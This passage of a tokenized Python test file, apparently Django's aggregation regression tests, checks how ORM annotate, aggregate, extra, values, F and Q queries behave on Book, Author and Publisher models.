"<STR_LIT>" ) , <EOL> pubdate = datetime . date ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:3> ) , <EOL> publisher_id = <NUM_LIT:2> , <EOL> rating = <NUM_LIT> <EOL> ) <EOL> self . 
assertTrue ( obj . manufacture_cost == <NUM_LIT> or obj . manufacture_cost == Decimal ( '<STR_LIT>' ) ) <EOL> obj = Book . objects . extra ( select = { '<STR_LIT>' : '<STR_LIT>' } ) . annotate ( mean_auth_age = Avg ( '<STR_LIT>' ) ) . get ( pk = <NUM_LIT:2> ) <EOL> self . assertObjectAttrs ( obj , <EOL> contact_id = <NUM_LIT:3> , <EOL> id = <NUM_LIT:2> , <EOL> isbn = u'<STR_LIT>' , <EOL> mean_auth_age = <NUM_LIT> , <EOL> name = u'<STR_LIT>' , <EOL> pages = <NUM_LIT> , <EOL> price = Decimal ( "<STR_LIT>" ) , <EOL> pubdate = datetime . date ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:3> ) , <EOL> publisher_id = <NUM_LIT:2> , <EOL> rating = <NUM_LIT> <EOL> ) <EOL> self . assertTrue ( obj . manufacture_cost == <NUM_LIT> or obj . manufacture_cost == Decimal ( '<STR_LIT>' ) ) <EOL> obj = Book . objects . annotate ( mean_auth_age = Avg ( '<STR_LIT>' ) ) . extra ( select = { '<STR_LIT>' : '<STR_LIT>' } ) . values ( ) . get ( pk = <NUM_LIT:2> ) <EOL> manufacture_cost = obj [ '<STR_LIT>' ] <EOL> self . assertTrue ( manufacture_cost == <NUM_LIT> or manufacture_cost == Decimal ( '<STR_LIT>' ) ) <EOL> del obj [ '<STR_LIT>' ] <EOL> self . assertEqual ( obj , { <EOL> "<STR_LIT>" : <NUM_LIT:3> , <EOL> "<STR_LIT:id>" : <NUM_LIT:2> , <EOL> "<STR_LIT>" : u"<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT:name>" : u"<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : Decimal ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : datetime . date ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:3> ) , <EOL> "<STR_LIT>" : <NUM_LIT:2> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> } ) <EOL> obj = Book . objects . values ( ) . annotate ( mean_auth_age = Avg ( '<STR_LIT>' ) ) . extra ( select = { '<STR_LIT>' : '<STR_LIT>' } ) . get ( pk = <NUM_LIT:2> ) <EOL> manufacture_cost = obj [ '<STR_LIT>' ] <EOL> self . assertTrue ( manufacture_cost == <NUM_LIT> or manufacture_cost == Decimal ( '<STR_LIT>' ) ) <EOL> del obj [ '<STR_LIT>' ] <EOL> self . 
assertEqual ( obj , { <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT:id>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT:name>' : u'<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : Decimal ( "<STR_LIT>" ) , <EOL> '<STR_LIT>' : datetime . date ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:3> ) , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : <NUM_LIT> <EOL> } ) <EOL> obj = Book . objects . annotate ( mean_auth_age = Avg ( '<STR_LIT>' ) ) . extra ( select = { '<STR_LIT>' : '<STR_LIT>' } ) . values ( '<STR_LIT:name>' ) . get ( pk = <NUM_LIT:1> ) <EOL> self . assertEqual ( obj , { <EOL> "<STR_LIT:name>" : u'<STR_LIT>' , <EOL> } ) <EOL> obj = Book . objects . annotate ( mean_auth_age = Avg ( '<STR_LIT>' ) ) . extra ( select = { '<STR_LIT>' : '<STR_LIT>' } ) . values ( '<STR_LIT:name>' , '<STR_LIT>' ) . get ( pk = <NUM_LIT:1> ) <EOL> self . assertEqual ( obj , { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT:name>' : u'<STR_LIT>' , <EOL> } ) <EOL> qs = Book . objects . annotate ( n_authors = Count ( '<STR_LIT>' ) ) . values ( '<STR_LIT:name>' ) . filter ( n_authors__gt = <NUM_LIT:2> ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> { "<STR_LIT:name>" : u'<STR_LIT>' } <EOL> ] , <EOL> lambda b : b , <EOL> ) <EOL> obj = Book . objects . values ( '<STR_LIT:name>' ) . annotate ( mean_auth_age = Avg ( '<STR_LIT>' ) ) . extra ( select = { '<STR_LIT>' : '<STR_LIT>' } ) . get ( pk = <NUM_LIT:1> ) <EOL> self . assertEqual ( obj , { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT:name>' : u'<STR_LIT>' , <EOL> } ) <EOL> self . assertEqual ( <EOL> len ( Author . objects . annotate ( Avg ( '<STR_LIT>' ) ) . values ( ) ) , <EOL> <NUM_LIT:9> <EOL> ) <EOL> qs = Book . objects . values ( '<STR_LIT>' ) . annotate ( oldest = Max ( '<STR_LIT>' ) ) . order_by ( '<STR_LIT>' , '<STR_LIT>' ) . annotate ( Max ( '<STR_LIT>' ) ) <EOL> self . 
assertQuerysetEqual ( <EOL> qs , [ <EOL> { '<STR_LIT>' : Decimal ( "<STR_LIT>" ) , '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:3> } , <EOL> { '<STR_LIT>' : Decimal ( "<STR_LIT>" ) , '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:7> } , <EOL> { '<STR_LIT>' : Decimal ( "<STR_LIT>" ) , '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , <EOL> { '<STR_LIT>' : Decimal ( "<STR_LIT>" ) , '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:9> } , <EOL> { '<STR_LIT>' : Decimal ( "<STR_LIT>" ) , '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:7> } <EOL> ] , <EOL> lambda b : b , <EOL> ) <EOL> def test_aggrate_annotation ( self ) : <EOL> vals = Book . objects . all ( ) . annotate ( num_authors = Count ( '<STR_LIT>' ) ) . aggregate ( Max ( '<STR_LIT>' ) , Max ( '<STR_LIT>' ) , Sum ( '<STR_LIT>' ) , Avg ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( vals , { <EOL> '<STR_LIT>' : <NUM_LIT:10> , <EOL> '<STR_LIT>' : Approximate ( <NUM_LIT> , places = <NUM_LIT:2> ) , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : Decimal ( "<STR_LIT>" ) <EOL> } ) <EOL> def test_field_error ( self ) : <EOL> self . assertRaises ( <EOL> FieldError , <EOL> lambda : Book . objects . all ( ) . aggregate ( num_authors = Count ( '<STR_LIT:foo>' ) ) <EOL> ) <EOL> self . assertRaises ( <EOL> FieldError , <EOL> lambda : Book . objects . all ( ) . annotate ( num_authors = Count ( '<STR_LIT:foo>' ) ) <EOL> ) <EOL> self . assertRaises ( <EOL> FieldError , <EOL> lambda : Book . objects . all ( ) . annotate ( num_authors = Count ( '<STR_LIT>' ) ) . aggregate ( Max ( '<STR_LIT:foo>' ) ) <EOL> ) <EOL> def test_more ( self ) : <EOL> self . assertEqual ( <EOL> Book . objects . annotate ( num_authors = Count ( '<STR_LIT>' ) ) . count ( ) , <EOL> <NUM_LIT:6> <EOL> ) <EOL> vals = Book . objects . annotate ( num_authors = Count ( '<STR_LIT>' ) ) . aggregate ( Max ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( <EOL> vals , <EOL> { '<STR_LIT>' : <NUM_LIT:3> } <EOL> ) <EOL> vals = Publisher . objects . 
annotate ( avg_price = Avg ( '<STR_LIT>' ) ) . aggregate ( Max ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( <EOL> vals , <EOL> { '<STR_LIT>' : <NUM_LIT> } <EOL> ) <EOL> vals = Book . objects . aggregate ( number = Max ( '<STR_LIT>' ) , select = Max ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( <EOL> vals , <EOL> { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> } <EOL> ) <EOL> obj = Book . objects . select_related ( '<STR_LIT>' ) . annotate ( num_authors = Count ( '<STR_LIT>' ) ) . values ( ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( obj , { <EOL> '<STR_LIT>' : <NUM_LIT:8> , <EOL> '<STR_LIT:id>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> '<STR_LIT:name>' : u'<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : Decimal ( "<STR_LIT>" ) , <EOL> '<STR_LIT>' : datetime . date ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:15> ) , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } ) <EOL> self . assertEqual ( <EOL> len ( Book . objects . annotate ( num_authors = Count ( '<STR_LIT>' ) ) ) , <EOL> <NUM_LIT:6> <EOL> ) <EOL> self . assertEqual ( <EOL> len ( Book . objects . annotate ( num_authors = Count ( '<STR_LIT>' ) ) . filter ( num_authors__gt = <NUM_LIT:2> ) ) , <EOL> <NUM_LIT:1> <EOL> ) <EOL> self . assertEqual ( <EOL> len ( Book . objects . annotate ( num_authors = Count ( '<STR_LIT>' ) ) . exclude ( num_authors__gt = <NUM_LIT:2> ) ) , <EOL> <NUM_LIT:5> <EOL> ) <EOL> self . assertEqual ( <EOL> len ( Book . objects . annotate ( num_authors = Count ( '<STR_LIT>' ) ) . filter ( num_authors__lt = <NUM_LIT:3> ) . exclude ( num_authors__lt = <NUM_LIT:2> ) ) , <EOL> <NUM_LIT:2> <EOL> ) <EOL> self . assertEqual ( <EOL> len ( Book . objects . annotate ( num_authors = Count ( '<STR_LIT>' ) ) . exclude ( num_authors__lt = <NUM_LIT:2> ) . filter ( num_authors__lt = <NUM_LIT:3> ) ) , <EOL> <NUM_LIT:2> <EOL> ) <EOL> def test_aggregate_fexpr ( self ) : <EOL> qs = Publisher . objects . 
annotate ( num_books = Count ( '<STR_LIT>' ) ) . filter ( num_books__lt = F ( '<STR_LIT>' ) / <NUM_LIT:2> ) . order_by ( '<STR_LIT:name>' ) . values ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:name>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:9> } , <EOL> { '<STR_LIT>' : <NUM_LIT:2> , '<STR_LIT:name>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:7> } <EOL> ] , <EOL> lambda p : p , <EOL> ) <EOL> qs = Publisher . objects . annotate ( num_books = Count ( '<STR_LIT>' ) ) . exclude ( num_books__lt = F ( '<STR_LIT>' ) / <NUM_LIT:2> ) . order_by ( '<STR_LIT:name>' ) . values ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> { '<STR_LIT>' : <NUM_LIT:2> , '<STR_LIT:name>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:3> } , <EOL> { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT:name>' : u"<STR_LIT>" , '<STR_LIT>' : <NUM_LIT:0> } , <EOL> { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:name>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:1> } <EOL> ] , <EOL> lambda p : p , <EOL> ) <EOL> qs = Publisher . objects . annotate ( num_books = Count ( '<STR_LIT>' ) ) . filter ( num_awards__gt = <NUM_LIT:2> * F ( '<STR_LIT>' ) ) . order_by ( '<STR_LIT:name>' ) . values ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:name>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:9> } , <EOL> { '<STR_LIT>' : <NUM_LIT:2> , '<STR_LIT:name>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:7> } <EOL> ] , <EOL> lambda p : p , <EOL> ) <EOL> qs = Publisher . objects . annotate ( num_books = Count ( '<STR_LIT>' ) ) . exclude ( num_books__lt = F ( '<STR_LIT>' ) / <NUM_LIT:2> ) . order_by ( '<STR_LIT:name>' ) . values ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . 
assertQuerysetEqual ( <EOL> qs , [ <EOL> { '<STR_LIT>' : <NUM_LIT:2> , '<STR_LIT:name>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:3> } , <EOL> { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT:name>' : u"<STR_LIT>" , '<STR_LIT>' : <NUM_LIT:0> } , <EOL> { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:name>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:1> } <EOL> ] , <EOL> lambda p : p , <EOL> ) <EOL> def test_db_col_table ( self ) : <EOL> qs = Clues . objects . values ( '<STR_LIT>' ) . annotate ( Appearances = Count ( '<STR_LIT>' ) , Distinct_Clues = Count ( '<STR_LIT>' , distinct = True ) ) <EOL> self . assertQuerysetEqual ( qs , [ ] ) <EOL> qs = Entries . objects . annotate ( clue_count = Count ( '<STR_LIT>' ) ) <EOL> self . assertQuerysetEqual ( qs , [ ] ) <EOL> def test_empty ( self ) : <EOL> self . assertEqual ( <EOL> Book . objects . filter ( id__in = [ ] ) . count ( ) , <EOL> <NUM_LIT:0> <EOL> ) <EOL> vals = Book . objects . filter ( id__in = [ ] ) . aggregate ( num_authors = Count ( '<STR_LIT>' ) , avg_authors = Avg ( '<STR_LIT>' ) , max_authors = Max ( '<STR_LIT>' ) , max_price = Max ( '<STR_LIT>' ) , max_rating = Max ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( <EOL> vals , <EOL> { '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : None , '<STR_LIT>' : None } <EOL> ) <EOL> qs = Publisher . objects . filter ( pk = <NUM_LIT:5> ) . annotate ( num_authors = Count ( '<STR_LIT>' ) , avg_authors = Avg ( '<STR_LIT>' ) , max_authors = Max ( '<STR_LIT>' ) , max_price = Max ( '<STR_LIT>' ) , max_rating = Max ( '<STR_LIT>' ) ) . values ( ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> { '<STR_LIT>' : None , '<STR_LIT:name>' : u"<STR_LIT>" , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : None , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : None , '<STR_LIT:id>' : <NUM_LIT:5> , '<STR_LIT>' : None } <EOL> ] , <EOL> lambda p : p <EOL> ) <EOL> def test_more_more ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Book . objects . 
annotate ( num_authors = Count ( '<STR_LIT>' ) ) . order_by ( '<STR_LIT>' , '<STR_LIT:name>' ) , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> lambda b : b . name <EOL> ) <EOL> qs = Book . objects . filter ( rating__lt = <NUM_LIT> ) . select_related ( ) . annotate ( Avg ( '<STR_LIT>' ) ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> ( u'<STR_LIT>' , <NUM_LIT> , u'<STR_LIT>' , u'<STR_LIT>' ) , <EOL> ( u'<STR_LIT>' , <NUM_LIT> , u'<STR_LIT>' , u'<STR_LIT>' ) , <EOL> ( u'<STR_LIT>' , Approximate ( <NUM_LIT> , places = <NUM_LIT:2> ) , u'<STR_LIT>' , u'<STR_LIT>' ) , <EOL> ( u'<STR_LIT>' , <NUM_LIT> , u'<STR_LIT>' , u'<STR_LIT>' ) <EOL> ] , <EOL> lambda b : ( b . name , b . authors__age__avg , b . publisher . name , b . contact . name ) <EOL> ) <EOL> qs = Book . objects . extra ( select = { '<STR_LIT>' : '<STR_LIT>' } ) . values ( '<STR_LIT>' ) . annotate ( Count ( '<STR_LIT:id>' ) ) . order_by ( '<STR_LIT>' ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:2> } , <EOL> { '<STR_LIT>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:1> } , <EOL> { '<STR_LIT>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:2> } , <EOL> { '<STR_LIT>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:1> } <EOL> ] , <EOL> lambda b : b <EOL> ) <EOL> qs = Book . objects . extra ( select = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:foo>' : '<STR_LIT>' } ) . values ( '<STR_LIT>' ) . annotate ( Count ( '<STR_LIT:id>' ) ) . order_by ( '<STR_LIT>' ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:2> } , <EOL> { '<STR_LIT>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:1> } , <EOL> { '<STR_LIT>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:2> } , <EOL> { '<STR_LIT>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:1> } <EOL> ] , <EOL> lambda b : b <EOL> ) <EOL> ids = Book . objects . filter ( pages__gt = <NUM_LIT:100> ) . 
annotate ( n_authors = Count ( '<STR_LIT>' ) ) . filter ( n_authors__gt = <NUM_LIT:2> ) . order_by ( '<STR_LIT>' ) <EOL> self . assertQuerysetEqual ( <EOL> Book . objects . filter ( id__in = ids ) , [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> lambda b : b . name <EOL> ) <EOL> def test_duplicate_alias ( self ) : <EOL> self . assertRaises ( ValueError , Book . objects . all ( ) . annotate , Avg ( '<STR_LIT>' ) , authors__age__avg = Avg ( '<STR_LIT>' ) ) <EOL> def test_field_name_conflict ( self ) : <EOL> self . assertRaises ( ValueError , Author . objects . annotate , age = Avg ( '<STR_LIT>' ) ) <EOL> def test_m2m_name_conflict ( self ) : <EOL> self . assertRaises ( ValueError , Author . objects . annotate , friends = Count ( '<STR_LIT>' ) ) <EOL> def test_values_queryset_non_conflict ( self ) : <EOL> results = Author . objects . values ( '<STR_LIT:name>' ) . annotate ( age = Count ( '<STR_LIT>' ) ) . order_by ( '<STR_LIT:name>' ) <EOL> self . assertEquals ( len ( results ) , <NUM_LIT:9> ) <EOL> self . assertEquals ( results [ <NUM_LIT:0> ] [ '<STR_LIT:name>' ] , u'<STR_LIT>' ) <EOL> self . assertEquals ( results [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> results = Author . objects . values ( '<STR_LIT:name>' ) . annotate ( age = Avg ( '<STR_LIT>' ) ) . order_by ( '<STR_LIT:name>' ) <EOL> self . assertEquals ( len ( results ) , <NUM_LIT:9> ) <EOL> self . assertEquals ( results [ <NUM_LIT:0> ] [ '<STR_LIT:name>' ] , u'<STR_LIT>' ) <EOL> self . assertEquals ( results [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> results = Author . objects . values ( '<STR_LIT:name>' ) . annotate ( friends = Count ( '<STR_LIT>' ) ) . order_by ( '<STR_LIT:name>' ) <EOL> self . assertEquals ( len ( results ) , <NUM_LIT:9> ) <EOL> self . assertEquals ( results [ <NUM_LIT:0> ] [ '<STR_LIT:name>' ] , u'<STR_LIT>' ) <EOL> self . assertEquals ( results [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , <NUM_LIT:2> ) <EOL> def test_reverse_relation_name_conflict ( self ) : <EOL> self . 
assertRaises ( ValueError , Author . objects . annotate , book_contact_set = Avg ( '<STR_LIT>' ) ) <EOL> def test_pickle ( self ) : <EOL> qs = Book . objects . annotate ( num_authors = Count ( '<STR_LIT>' ) ) <EOL> pickle . dumps ( qs ) <EOL> query = qs . query . get_compiler ( qs . db ) . as_sql ( ) [ <NUM_LIT:0> ] <EOL> qs2 = pickle . loads ( pickle . dumps ( qs ) ) <EOL> self . assertEqual ( <EOL> qs2 . query . get_compiler ( qs2 . db ) . as_sql ( ) [ <NUM_LIT:0> ] , <EOL> query , <EOL> ) <EOL> def test_more_more_more ( self ) : <EOL> books = Book . objects . all ( ) <EOL> books . aggregate ( Avg ( "<STR_LIT>" ) ) <EOL> self . assertQuerysetEqual ( <EOL> books . all ( ) , [ <EOL> u'<STR_LIT>' , <EOL> u'<STR_LIT>' , <EOL> u'<STR_LIT>' , <EOL> u'<STR_LIT>' , <EOL> u'<STR_LIT>' , <EOL> u'<STR_LIT>' <EOL> ] , <EOL> lambda b : b . name <EOL> ) <EOL> qs = Book . objects . annotate ( num_authors = Count ( '<STR_LIT>' ) ) . filter ( num_authors = <NUM_LIT:2> ) . dates ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> datetime . datetime ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:15> , <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> datetime . datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT:6> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> ] , <EOL> lambda b : b <EOL> ) <EOL> qs = Book . objects . annotate ( mean_auth_age = Avg ( '<STR_LIT>' ) ) . extra ( select = { '<STR_LIT>' : '<STR_LIT>' } , select_params = [ <NUM_LIT:1> , <NUM_LIT:2> ] ) . order_by ( '<STR_LIT>' ) . values ( '<STR_LIT>' ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> <EOL> ] , <EOL> lambda b : int ( b [ "<STR_LIT>" ] ) <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . values ( '<STR_LIT>' ) . annotate ( Count ( '<STR_LIT>' ) ) . count ( ) , <EOL> <NUM_LIT:4> <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . annotate ( Count ( '<STR_LIT>' ) ) . values ( '<STR_LIT>' ) . 
count ( ) , <EOL> <NUM_LIT:6> <EOL> ) <EOL> publishers = Publisher . objects . filter ( id__in = [ <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> self . assertQuerysetEqual ( <EOL> publishers , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] , <EOL> lambda p : p . name <EOL> ) <EOL> publishers = publishers . annotate ( n_books = Count ( "<STR_LIT>" ) ) <EOL> self . assertEqual ( <EOL> publishers [ <NUM_LIT:0> ] . n_books , <EOL> <NUM_LIT:2> <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> publishers , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> lambda p : p . name <EOL> ) <EOL> books = Book . objects . filter ( publisher__in = publishers ) <EOL> self . assertQuerysetEqual ( <EOL> books , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> lambda b : b . name <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> publishers , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> lambda p : p . name <EOL> ) <EOL> self . assertEqual ( <EOL> HardbackBook . objects . aggregate ( n_pages = Sum ( '<STR_LIT>' ) ) , <EOL> { '<STR_LIT>' : <NUM_LIT> } <EOL> ) <EOL> self . assertEqual ( <EOL> HardbackBook . objects . aggregate ( n_pages = Sum ( '<STR_LIT>' ) ) , <EOL> { '<STR_LIT>' : <NUM_LIT> } , <EOL> ) <EOL> qs = HardbackBook . objects . annotate ( n_authors = Count ( '<STR_LIT>' ) ) . values ( '<STR_LIT:name>' , '<STR_LIT>' ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> { '<STR_LIT>' : <NUM_LIT:2> , '<STR_LIT:name>' : u'<STR_LIT>' } , <EOL> { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:name>' : u'<STR_LIT>' } <EOL> ] , <EOL> lambda h : h <EOL> ) <EOL> qs = HardbackBook . objects . annotate ( n_authors = Count ( '<STR_LIT>' ) ) . values ( '<STR_LIT:name>' , '<STR_LIT>' ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> { '<STR_LIT>' : <NUM_LIT:2> , '<STR_LIT:name>' : u'<STR_LIT>' } , <EOL> { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:name>' : u'<STR_LIT>' } <EOL> ] , <EOL> lambda h : h , <EOL> ) <EOL> self . 
assertRaises ( <EOL> FieldError , <EOL> lambda : Book . objects . annotate ( mean_age = Avg ( '<STR_LIT>' ) ) . annotate ( Avg ( '<STR_LIT>' ) ) <EOL> ) <EOL> def test_empty_filter_count ( self ) : <EOL> self . assertEqual ( <EOL> Author . objects . filter ( id__in = [ ] ) . annotate ( Count ( "<STR_LIT>" ) ) . count ( ) , <EOL> <NUM_LIT:0> <EOL> ) <EOL> def test_empty_filter_aggregate ( self ) : <EOL> self . assertEqual ( <EOL> Author . objects . filter ( id__in = [ ] ) . annotate ( Count ( "<STR_LIT>" ) ) . aggregate ( Count ( "<STR_LIT>" ) ) , <EOL> { "<STR_LIT>" : None } <EOL> ) <EOL> def test_annotate_and_join ( self ) : <EOL> self . assertEqual ( <EOL> Author . objects . annotate ( c = Count ( "<STR_LIT>" ) ) . exclude ( friends__name = "<STR_LIT>" ) . count ( ) , <EOL> Author . objects . count ( ) <EOL> ) <EOL> def test_f_expression_annotation ( self ) : <EOL> qs = Book . objects . values ( "<STR_LIT:name>" ) . annotate ( <EOL> n_authors = Count ( "<STR_LIT>" ) <EOL> ) . filter ( <EOL> pages__lt = F ( "<STR_LIT>" ) * <NUM_LIT:200> <EOL> ) . values_list ( "<STR_LIT>" ) <EOL> self . assertQuerysetEqual ( <EOL> Book . objects . filter ( pk__in = qs ) , [ <EOL> "<STR_LIT>" <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> def test_values_annotate_values ( self ) : <EOL> qs = Book . objects . values ( "<STR_LIT:name>" ) . annotate ( <EOL> n_authors = Count ( "<STR_LIT>" ) <EOL> ) . values_list ( "<STR_LIT>" , flat = True ) <EOL> self . assertEqual ( list ( qs ) , list ( Book . objects . values_list ( "<STR_LIT>" , flat = True ) ) ) <EOL> def test_having_group_by ( self ) : <EOL> qs = Book . objects . values_list ( "<STR_LIT:name>" ) . annotate ( <EOL> n_authors = Count ( "<STR_LIT>" ) <EOL> ) . filter ( <EOL> pages__gt = F ( "<STR_LIT>" ) <EOL> ) . values_list ( "<STR_LIT:name>" , flat = True ) <EOL> self . assertEqual ( <EOL> list ( qs ) , list ( Book . objects . 
values_list ( "<STR_LIT:name>" , flat = True ) ) <EOL> ) <EOL> def test_annotation_disjunction ( self ) : <EOL> qs = Book . objects . annotate ( n_authors = Count ( "<STR_LIT>" ) ) . filter ( <EOL> Q ( n_authors = <NUM_LIT:2> ) | Q ( name = "<STR_LIT>" ) <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> qs = Book . objects . annotate ( n_authors = Count ( "<STR_LIT>" ) ) . filter ( <EOL> Q ( name = "<STR_LIT>" ) | ( Q ( name = "<STR_LIT>" ) & Q ( n_authors = <NUM_LIT:3> ) ) <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> qs = Publisher . objects . annotate ( <EOL> rating_sum = Sum ( "<STR_LIT>" ) , <EOL> book_count = Count ( "<STR_LIT>" ) <EOL> ) . filter ( <EOL> Q ( rating_sum__gt = <NUM_LIT> ) | Q ( rating_sum__isnull = True ) <EOL> ) . order_by ( '<STR_LIT>' ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> qs = Publisher . objects . annotate ( <EOL> rating_sum = Sum ( "<STR_LIT>" ) , <EOL> book_count = Count ( "<STR_LIT>" ) <EOL> ) . filter ( <EOL> Q ( pk__lt = F ( "<STR_LIT>" ) ) | Q ( rating_sum = None ) <EOL> ) . order_by ( "<STR_LIT>" ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) 